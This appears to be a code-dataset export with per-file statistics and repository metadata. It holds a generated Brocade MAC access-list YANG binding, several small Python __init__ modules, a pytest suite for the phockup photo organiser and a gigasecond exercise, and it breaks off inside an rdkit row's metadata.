self.__src_mac_addr_mask = t
if hasattr(self, '_set'):
self._set()
def _unset_src_mac_addr_mask(self):
self.__src_mac_addr_mask = YANGDynClass(base=unicode, is_leaf=True, yang_name="src-mac-addr-mask", rest_name="src-mac-addr-mask", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='src-dst-mac-address-mask-type', is_config=True)
def _get_count(self):
"""
Getter method for count, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/count (empty)
"""
return self.__count
def _set_count(self, v, load=False):
"""
Setter method for count, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/count (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_count is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_count() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="count", rest_name="count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Packet count', u'cli-optional-in-sequence': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """count must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="count", rest_name="count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Packet count', u'cli-optional-in-sequence': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)""",
})
self.__count = t
if hasattr(self, '_set'):
self._set()
def _unset_count(self):
self.__count = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="count", rest_name="count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Packet count', u'cli-optional-in-sequence': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)
def _get_log(self):
"""
Getter method for log, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/log (empty)
"""
return self.__log
def _set_log(self, v, load=False):
"""
Setter method for log, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/log (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_log is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_log() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="log", rest_name="log", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Log Packet', u'cli-optional-in-sequence': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """log must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="log", rest_name="log", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Log Packet', u'cli-optional-in-sequence': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)""",
})
self.__log = t
if hasattr(self, '_set'):
self._set()
def _unset_log(self):
self.__log = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="log", rest_name="log", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Log Packet', u'cli-optional-in-sequence': None, u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)
def _get_copy_sflow(self):
"""
Getter method for copy_sflow, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/copy_sflow (empty)
"""
return self.__copy_sflow
def _set_copy_sflow(self, v, load=False):
"""
Setter method for copy_sflow, mapped from YANG variable /mac/access_list/standard/hide_mac_acl_std/seq/copy_sflow (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_copy_sflow is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_copy_sflow() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="copy-sflow", rest_name="copy-sflow", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'cli-optional-in-sequence': None, u'hidden': u'full', u'info': u'Copy to sFlow Collector', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """copy_sflow must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="copy-sflow", rest_name="copy-sflow", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'cli-optional-in-sequence': None, u'hidden': u'full', u'info': u'Copy to sFlow Collector', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)""",
})
self.__copy_sflow = t
if hasattr(self, '_set'):
self._set()
def _unset_copy_sflow(self):
self.__copy_sflow = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="copy-sflow", rest_name="copy-sflow", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'cli-optional-in-sequence': None, u'hidden': u'full', u'info': u'Copy to sFlow Collector', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='empty', is_config=True)
seq_id = __builtin__.property(_get_seq_id, _set_seq_id)
action = __builtin__.property(_get_action, _set_action)
source = __builtin__.property(_get_source, _set_source)
srchost = __builtin__.property(_get_srchost, _set_srchost)
src_mac_addr_mask = __builtin__.property(_get_src_mac_addr_mask, _set_src_mac_addr_mask)
count = __builtin__.property(_get_count, _set_count)
log = __builtin__.property(_get_log, _set_log)
copy_sflow = __builtin__.property(_get_copy_sflow, _set_copy_sflow)
_pyangbind_elements = {'seq_id': seq_id, 'action': action, 'source': source, 'srchost': srchost, 'src_mac_addr_mask': src_mac_addr_mask, 'count': count, 'log': log, 'copy_sflow': copy_sflow, }
| 76.643432
| 698
| 0.711173
| 4,068
| 28,588
| 4.770895
| 0.053589
| 0.045342
| 0.057605
| 0.071105
| 0.868869
| 0.840478
| 0.828318
| 0.808172
| 0.807451
| 0.792354
| 0
| 0.007269
| 0.143382
| 28,588
| 372
| 699
| 76.849462
| 0.785251
| 0.141283
| 0
| 0.443966
| 0
| 0.034483
| 0.38721
| 0.191722
| 0
| 0
| 0
| 0
| 0
| 1
| 0.116379
| false
| 0
| 0.034483
| 0
| 0.267241
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
83a51432af726987a7a6708239cc18c18d05c2d6
| 49
|
py
|
Python
|
dexp/processing/isonet/__init__.py
|
haesleinhuepf/dexp
|
2ea84f3db323724588fac565fae56f0d522bc5ca
|
[
"BSD-3-Clause"
] | 16
|
2021-04-21T14:09:19.000Z
|
2022-03-22T02:30:59.000Z
|
dexp/processing/isonet/__init__.py
|
haesleinhuepf/dexp
|
2ea84f3db323724588fac565fae56f0d522bc5ca
|
[
"BSD-3-Clause"
] | 28
|
2021-04-15T17:43:08.000Z
|
2022-03-29T16:08:35.000Z
|
dexp/processing/isonet/__init__.py
|
haesleinhuepf/dexp
|
2ea84f3db323724588fac565fae56f0d522bc5ca
|
[
"BSD-3-Clause"
] | 3
|
2022-02-08T17:41:30.000Z
|
2022-03-18T15:32:27.000Z
|
from dexp.processing.isonet.isonet import IsoNet
| 24.5
| 48
| 0.857143
| 7
| 49
| 6
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 49
| 1
| 49
| 49
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
83ad153ed9b015a4de8d400f80196ebe8ba792df
| 94
|
py
|
Python
|
edge/model/safety_models/__init__.py
|
Data-Science-in-Mechanical-Engineering/edge
|
586eaba2f0957e75940f4f19fa774603f57eae89
|
[
"MIT"
] | null | null | null |
edge/model/safety_models/__init__.py
|
Data-Science-in-Mechanical-Engineering/edge
|
586eaba2f0957e75940f4f19fa774603f57eae89
|
[
"MIT"
] | null | null | null |
edge/model/safety_models/__init__.py
|
Data-Science-in-Mechanical-Engineering/edge
|
586eaba2f0957e75940f4f19fa774603f57eae89
|
[
"MIT"
] | null | null | null |
from .safety_measure import SafetyMeasure, MaternSafety
from .safety_truth import SafetyTruth
| 31.333333
| 55
| 0.87234
| 11
| 94
| 7.272727
| 0.727273
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095745
| 94
| 2
| 56
| 47
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
83fb5516f4dec5aec5ddfda0d79b5461ce77e908
| 981
|
py
|
Python
|
pyrandomtools/__init__.py
|
rickalm/pyrandomtools
|
29e0fce08894590d2c142acd19e42c6160974c85
|
[
"MIT"
] | null | null | null |
pyrandomtools/__init__.py
|
rickalm/pyrandomtools
|
29e0fce08894590d2c142acd19e42c6160974c85
|
[
"MIT"
] | null | null | null |
pyrandomtools/__init__.py
|
rickalm/pyrandomtools
|
29e0fce08894590d2c142acd19e42c6160974c85
|
[
"MIT"
] | null | null | null |
# I understand the python convention of __all__ to specify the list of subordinate functions
# to include from a module. I still choose this method of exposing individual functions
# from their various components as a way to document them and specify which component they are
# dervied.
#
# in addition any special handling for v2/3 can be addressed here as well
#
from pyrandomtools.aws_functions import parse_arn
from pyrandomtools.aws_functions import validate_region
from pyrandomtools.functions import name_of
from pyrandomtools.functions import str2bool
from pyrandomtools.functions import lcase_keys
from pyrandomtools.functions import firstValid
from pyrandomtools.functions import rangePick
from pyrandomtools.functions import treeGet
from pyrandomtools.functions import asList
from pyrandomtools.functions import listContains
from pyrandomtools.functions import validInt
from pyrandomtools.functions import validNumber
from pyrandomtools.functions import function_name
| 42.652174
| 94
| 0.85525
| 131
| 981
| 6.320611
| 0.51145
| 0.266908
| 0.345411
| 0.425121
| 0.084541
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00348
| 0.121305
| 981
| 22
| 95
| 44.590909
| 0.957077
| 0.356779
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
86042f538b684f9e4a88b3e539986ef01c67d3fe
| 25
|
py
|
Python
|
src/data/__init__.py
|
kurt-stolle/tue-cityscapes-segmentation
|
cdc8bdc749ac57f1b690cadc46d1d3ecbb48c886
|
[
"MIT"
] | null | null | null |
src/data/__init__.py
|
kurt-stolle/tue-cityscapes-segmentation
|
cdc8bdc749ac57f1b690cadc46d1d3ecbb48c886
|
[
"MIT"
] | null | null | null |
src/data/__init__.py
|
kurt-stolle/tue-cityscapes-segmentation
|
cdc8bdc749ac57f1b690cadc46d1d3ecbb48c886
|
[
"MIT"
] | null | null | null |
from .cityscapes import *
| 25
| 25
| 0.8
| 3
| 25
| 6.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 25
| 1
| 25
| 25
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f7bbbd5fefc7bb332d4252e899a1738cce87859a
| 130
|
py
|
Python
|
python/gigasecond/gigasecond.py
|
dvl/exercism.io-solutions
|
1eda73318bc0c568958df32f3b98d937f25a994f
|
[
"MIT"
] | 1
|
2016-02-01T02:23:28.000Z
|
2016-02-01T02:23:28.000Z
|
python/gigasecond/gigasecond.py
|
dvl/exercism.io-solutions
|
1eda73318bc0c568958df32f3b98d937f25a994f
|
[
"MIT"
] | null | null | null |
python/gigasecond/gigasecond.py
|
dvl/exercism.io-solutions
|
1eda73318bc0c568958df32f3b98d937f25a994f
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import datetime
def add_gigasecond(birthdate):
return birthdate + datetime.timedelta(seconds=10**9)
| 18.571429
| 56
| 0.707692
| 16
| 130
| 5.6875
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.036036
| 0.146154
| 130
| 7
| 56
| 18.571429
| 0.783784
| 0.161538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
7919c7d8043a7b0812046617111ef1c7cec1d37a
| 14,491
|
py
|
Python
|
tests/test_phockup.py
|
pabera/phockup
|
5698c5cb70f9a215b3c44198924d28558f432288
|
[
"MIT"
] | null | null | null |
tests/test_phockup.py
|
pabera/phockup
|
5698c5cb70f9a215b3c44198924d28558f432288
|
[
"MIT"
] | null | null | null |
tests/test_phockup.py
|
pabera/phockup
|
5698c5cb70f9a215b3c44198924d28558f432288
|
[
"MIT"
] | 2
|
2021-07-10T13:46:01.000Z
|
2021-08-06T03:27:13.000Z
|
#!/usr/bin/env python3
import pytest
import shutil
import sys
import os
import logging
from datetime import datetime
from src.dependency import check_dependencies
from src.exif import Exif
from src.phockup import Phockup
os.chdir(os.path.dirname(__file__))
def test_check_dependencies(mocker):
mocker.patch('shutil.which', return_value='exiftool')
mocker.patch('sys.exit')
check_dependencies()
assert not sys.exit.called
def test_check_dependencies_missing(mocker):
mocker.patch('shutil.which', return_value=None)
mocker.patch('sys.exit')
with pytest.raises(Exception, match="Exiftool is not installed. \
Visit http://www.sno.phy.queensu.ca/~phil/exiftool/"):
check_dependencies()
def test_exception_if_missing_input_directory(mocker):
mocker.patch('os.makedirs')
mocker.patch('sys.exit')
with pytest.raises(RuntimeError, match="Input directory 'in' does not \
exist or cannot be accessed"):
Phockup('in', 'out')
def test_removing_trailing_slash_for_input_output(mocker):
mocker.patch('os.makedirs')
mocker.patch('sys.exit')
mocker.patch.object(Phockup, 'check_directories')
if sys.platform == 'win32':
phockup = Phockup('in\\', 'out\\')
else:
phockup = Phockup('in/', 'out/')
assert phockup.input_dir == 'in'
assert phockup.output_dir == 'out'
def test_exception_for_no_write_access_when_creating_output_dir(mocker):
mocker.patch.object(Phockup, 'walk_directory')
with pytest.raises(OSError, match="Cannot create output '/root/phockup' \
directory. No write access!"):
Phockup('input', '/root/phockup')
def test_walking_directory():
shutil.rmtree('output', ignore_errors=True)
Phockup('input', 'output')
dir1 = 'output/2017/01/01'
dir2 = 'output/2017/10/06'
dir3 = 'output/unknown'
dir4 = 'output/2018/01/01/'
assert os.path.isdir(dir1)
assert os.path.isdir(dir2)
assert os.path.isdir(dir3)
assert os.path.isdir(dir4)
assert len([name for name in os.listdir(dir1) if
os.path.isfile(os.path.join(dir1, name))]) == 3
assert len([name for name in os.listdir(dir2) if
os.path.isfile(os.path.join(dir2, name))]) == 1
assert len([name for name in os.listdir(dir3) if
os.path.isfile(os.path.join(dir3, name))]) == 1
assert len([name for name in os.listdir(dir4) if
os.path.isfile(os.path.join(dir4, name))]) == 1
shutil.rmtree('output', ignore_errors=True)
def test_dry_run():
shutil.rmtree('output', ignore_errors=True)
Phockup('input', 'output', dry_run=True)
assert not os.path.isdir('output')
dir1 = 'output/2017/01/01'
dir2 = 'output/2017/10/06'
dir3 = 'output/unknown'
dir4 = 'output/2018/01/01/'
assert not os.path.isdir(dir1)
assert not os.path.isdir(dir2)
assert not os.path.isdir(dir3)
assert not os.path.isdir(dir4)
def test_get_file_type(mocker):
mocker.patch.object(Phockup, 'check_directories')
assert Phockup('in', '.').get_file_type("image/jpeg")
assert Phockup('in', '.').get_file_type("video/mp4")
assert not Phockup('in', '.').get_file_type("foo/bar")
def test_get_file_name(mocker):
mocker.patch.object(Phockup, 'check_directories')
mocker.patch.object(Phockup, 'walk_directory')
date = {
"date": datetime(2017, 1, 1, 1, 1, 1),
"subseconds": "20"
}
assert Phockup('in', 'out').get_file_name("Bar/Foo.jpg", date) == \
"20170101-01010120.jpg"
def test_get_file_name_is_original_on_exception(mocker):
mocker.patch.object(Phockup, 'check_directories')
mocker.patch.object(Phockup, 'walk_directory')
assert Phockup('in', 'out').get_file_name("Bar/Foo.jpg", None) == "Foo.jpg"
def test_process_file_with_filename_date(mocker):
shutil.rmtree('output', ignore_errors=True)
mocker.patch.object(Phockup, 'check_directories')
mocker.patch.object(Phockup, 'walk_directory')
mocker.patch.object(Exif, 'data')
Exif.data.return_value = {
"MIMEType": "image/jpeg"
}
Phockup('input', 'output').process_file("input/date_20170101_010101.jpg")
assert os.path.isfile("output/2017/01/01/20170101-010101.jpg")
shutil.rmtree('output', ignore_errors=True)
def test_process_link_to_file_with_filename_date(mocker):
shutil.rmtree('output', ignore_errors=True)
mocker.patch.object(Phockup, 'check_directories')
mocker.patch.object(Phockup, 'walk_directory')
Phockup('input', 'output').process_file(
"input/link_to_date_20170101_010101.jpg")
assert os.path.isfile("output/2017/01/01/20170101-010101.jpg")
shutil.rmtree('output', ignore_errors=True)
def test_process_broken_link(mocker, caplog):
shutil.rmtree('output', ignore_errors=True)
mocker.patch.object(Phockup, 'check_directories')
mocker.patch.object(Phockup, 'walk_directory')
with caplog.at_level(logging.WARNING):
Phockup('input', 'output').process_file("input/not_a_file.jpg")
assert 'skipped, no such file or directory' in caplog.text
shutil.rmtree('output', ignore_errors=True)
def test_process_broken_link_move(mocker, caplog):
shutil.rmtree('output', ignore_errors=True)
mocker.patch.object(Phockup, 'check_directories')
mocker.patch.object(Phockup, 'walk_directory')
phockup = Phockup('input', 'output', move=True)
phockup.process_file("input/not_a_file.jpg")
with caplog.at_level(logging.WARNING):
Phockup('input', 'output').process_file("input/not_a_file.jpg")
assert 'skipped, no such file or directory' in caplog.text
shutil.rmtree('output', ignore_errors=True)
def test_process_image_exif_date(mocker):
shutil.rmtree('output', ignore_errors=True)
mocker.patch.object(Phockup, 'check_directories')
mocker.patch.object(Phockup, 'walk_directory')
Phockup('input', 'output').process_file("input/exif.jpg")
assert os.path.isfile("output/2017/01/01/20170101-010101.jpg")
shutil.rmtree('output', ignore_errors=True)
def test_process_image_xmp(mocker):
shutil.rmtree('output', ignore_errors=True)
mocker.patch.object(Phockup, 'check_directories')
mocker.patch.object(Phockup, 'walk_directory')
Phockup('input', 'output').process_file("input/xmp.jpg")
assert os.path.isfile("output/2017/01/01/20170101-010101.jpg")
assert os.path.isfile("output/2017/01/01/20170101-010101.jpg.xmp")
shutil.rmtree('output', ignore_errors=True)
def test_process_image_xmp_noext(mocker):
shutil.rmtree('output', ignore_errors=True)
mocker.patch.object(Phockup, 'check_directories')
mocker.patch.object(Phockup, 'walk_directory')
Phockup('input', 'output').process_file("input/xmp_noext.jpg")
assert os.path.isfile("output/2017/01/01/20170101-010101.jpg")
assert os.path.isfile("output/2017/01/01/20170101-010101.xmp")
shutil.rmtree('output', ignore_errors=True)
def test_process_image_xmp_ext_and_noext(mocker):
shutil.rmtree('output', ignore_errors=True)
mocker.patch.object(Phockup, 'check_directories')
mocker.patch.object(Phockup, 'walk_directory')
Phockup('input', 'output').process_file("input/xmp_ext.jpg")
assert os.path.isfile("output/2017/01/01/20170101-010101.jpg")
assert os.path.isfile("output/2017/01/01/20170101-010101.xmp")
assert os.path.isfile("output/2017/01/01/20170101-010101.jpg.xmp")
shutil.rmtree('output', ignore_errors=True)
def test_process_image_unknown(mocker):
shutil.rmtree('output', ignore_errors=True)
mocker.patch.object(Phockup, 'check_directories')
mocker.patch.object(Phockup, 'walk_directory')
mocker.patch.object(Exif, 'data')
Exif.data.return_value = {
"MIMEType": "image/jpeg"
}
Phockup('input', 'output').process_file("input/UNKNOWN.jpg")
assert os.path.isfile("output/unknown/unknown.jpg")
shutil.rmtree('output', ignore_errors=True)
def test_process_other(mocker):
shutil.rmtree('output', ignore_errors=True)
mocker.patch.object(Phockup, 'check_directories')
mocker.patch.object(Phockup, 'walk_directory')
Phockup('input', 'output').process_file("input/other.txt")
assert os.path.isfile("output/unknown/other.txt")
shutil.rmtree('output', ignore_errors=True)
def test_process_move(mocker):
shutil.rmtree('output', ignore_errors=True)
mocker.patch.object(Phockup, 'check_directories')
mocker.patch.object(Phockup, 'walk_directory')
mocker.patch.object(Exif, 'data')
Exif.data.return_value = {
"MIMEType": "image/jpeg"
}
phockup = Phockup('input', 'output', move=True)
open("input/tmp_20170101_010101.jpg", "w").close()
open("input/tmp_20170101_010101.xmp", "w").close()
phockup.process_file("input/tmp_20170101_010101.jpg")
phockup.process_file("input/tmp_20170101_010101.xmp")
assert not os.path.isfile("input/tmp_20170101_010101.jpg")
assert not os.path.isfile("input/tmp_20170101_010101.xmp")
assert os.path.isfile("output/2017/01/01/20170101-010101.jpg")
assert os.path.isfile("output/2017/01/01/20170101-010101.xmp")
shutil.rmtree('output', ignore_errors=True)
def test_process_link(mocker):
shutil.rmtree('output', ignore_errors=True)
mocker.patch.object(Phockup, 'check_directories')
mocker.patch.object(Phockup, 'walk_directory')
mocker.patch.object(Exif, 'data')
Exif.data.return_value = {
"MIMEType": "image/jpeg"
}
phockup = Phockup('input', 'output', link=True)
open("input/tmp_20170101_010101.jpg", "w").close()
open("input/tmp_20170101_010101.xmp", "w").close()
phockup.process_file("input/tmp_20170101_010101.jpg")
phockup.process_file("input/tmp_20170101_010101.xmp")
assert os.path.isfile("input/tmp_20170101_010101.jpg")
assert os.path.isfile("input/tmp_20170101_010101.xmp")
assert os.path.isfile("output/2017/01/01/20170101-010101.jpg")
assert os.path.isfile("output/2017/01/01/20170101-010101.xmp")
shutil.rmtree('output', ignore_errors=True)
os.remove("input/tmp_20170101_010101.jpg")
os.remove("input/tmp_20170101_010101.xmp")
def test_process_exists_same(mocker, caplog):
shutil.rmtree('output', ignore_errors=True)
mocker.patch.object(Phockup, 'check_directories')
mocker.patch.object(Phockup, 'walk_directory')
phockup = Phockup('input', 'output')
phockup.process_file("input/exif.jpg")
assert os.path.isfile("output/2017/01/01/20170101-010101.jpg")
with caplog.at_level(logging.INFO):
phockup.process_file("input/exif.jpg")
assert 'skipped, duplicated file' in caplog.text
shutil.rmtree('output', ignore_errors=True)
def test_process_same_date_different_files_rename(mocker):
shutil.rmtree('output', ignore_errors=True)
mocker.patch.object(Phockup, 'check_directories')
mocker.patch.object(Phockup, 'walk_directory')
phockup = Phockup('input', 'output')
phockup.process_file("input/exif.jpg")
mocker.patch.object(Exif, 'data')
Exif.data.return_value = {
"MIMEType": "image/jpeg",
"CreateDate": "2017:01:01 01:01:01"
}
phockup.process_file("input/date_20170101_010101.jpg")
assert os.path.isfile("output/2017/01/01/20170101-010101-2.jpg")
shutil.rmtree('output', ignore_errors=True)
def test_process_skip_xmp(mocker):
# Assume no errors == skip XMP file
mocker.patch.object(Phockup, 'check_directories')
mocker.patch.object(Phockup, 'walk_directory')
phockup = Phockup('input', 'output')
phockup.process_file("skip.xmp")
def test_process_skip_ignored_file():
shutil.rmtree('output', ignore_errors=True)
shutil.rmtree('input_ignored', ignore_errors=True)
os.mkdir('input_ignored')
open("input_ignored/.DS_Store", "w").close()
Phockup('input_ignored', 'output')
assert not os.path.isfile("output/unknown/.DS_Store")
shutil.rmtree('output', ignore_errors=True)
shutil.rmtree('input_ignored', ignore_errors=True)
def test_keep_original_filenames(mocker):
shutil.rmtree('output', ignore_errors=True)
mocker.patch.object(Phockup, 'check_directories')
mocker.patch.object(Phockup, 'walk_directory')
Phockup('input', 'output', original_filenames=True).process_file(
"input/exif.jpg")
assert os.path.isfile("output/2017/01/01/exif.jpg")
assert not os.path.isfile("output/2017/01/01/20170101-010101.jpg")
shutil.rmtree('output', ignore_errors=True)
def test_keep_original_filenames_and_filenames_case(mocker):
shutil.rmtree('output', ignore_errors=True)
mocker.patch.object(Phockup, 'check_directories')
mocker.patch.object(Phockup, 'walk_directory')
Phockup('input', 'output', original_filenames=True).process_file(
"input/UNKNOWN.jpg")
assert os.path.isfile("output/2017/10/06/UNKNOWN.jpg")
assert 'unknown.jpg' not in os.listdir("output/2017/10/06")
shutil.rmtree('output', ignore_errors=True)
def test_maxdepth_zero():
shutil.rmtree('output', ignore_errors=True)
Phockup('input', 'output', maxdepth=0)
dir1 = 'output/2017/01/01'
dir2 = 'output/2017/10/06'
dir3 = 'output/unknown'
assert os.path.isdir(dir1)
assert os.path.isdir(dir2)
assert os.path.isdir(dir3)
assert len([name for name in os.listdir(dir1) if
os.path.isfile(os.path.join(dir1, name))]) == 3
assert len([name for name in os.listdir(dir2) if
os.path.isfile(os.path.join(dir2, name))]) == 1
assert len([name for name in os.listdir(dir3) if
os.path.isfile(os.path.join(dir3, name))]) == 1
shutil.rmtree('output', ignore_errors=True)
def test_maxdepth_one():
shutil.rmtree('output', ignore_errors=True)
Phockup('input', 'output', maxdepth=1)
dir1 = 'output/2017/01/01'
dir2 = 'output/2017/10/06'
dir3 = 'output/unknown'
dir4 = 'output/2018/01/01/'
assert os.path.isdir(dir1)
assert os.path.isdir(dir2)
assert os.path.isdir(dir3)
assert os.path.isdir(dir4)
assert len([name for name in os.listdir(dir1) if
os.path.isfile(os.path.join(dir1, name))]) == 3
assert len([name for name in os.listdir(dir2) if
os.path.isfile(os.path.join(dir2, name))]) == 1
assert len([name for name in os.listdir(dir3) if
os.path.isfile(os.path.join(dir3, name))]) == 1
assert len([name for name in os.listdir(dir4) if
os.path.isfile(os.path.join(dir4, name))]) == 1
shutil.rmtree('output', ignore_errors=True)
| 38.234828
| 79
| 0.702574
| 1,996
| 14,491
| 4.947896
| 0.087174
| 0.03949
| 0.079182
| 0.099635
| 0.851458
| 0.833131
| 0.806298
| 0.777744
| 0.772783
| 0.733799
| 0
| 0.067694
| 0.148782
| 14,491
| 378
| 80
| 38.335979
| 0.732955
| 0.003795
| 0
| 0.622581
| 0
| 0
| 0.24186
| 0.091174
| 0
| 0
| 0
| 0
| 0.209677
| 1
| 0.096774
| false
| 0
| 0.029032
| 0
| 0.125806
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f711b0bb3f6d53da7f1abb4833845da364b2fe94
| 40
|
py
|
Python
|
rdkit/sping/Pyart/__init__.py
|
kazuyaujihara/rdkit
|
06027dcd05674787b61f27ba46ec0d42a6037540
|
[
"BSD-3-Clause"
] | 1,609
|
2015-01-05T02:41:13.000Z
|
2022-03-30T21:57:24.000Z
|
rdkit/sping/Pyart/__init__.py
|
kazuyaujihara/rdkit
|
06027dcd05674787b61f27ba46ec0d42a6037540
|
[
"BSD-3-Clause"
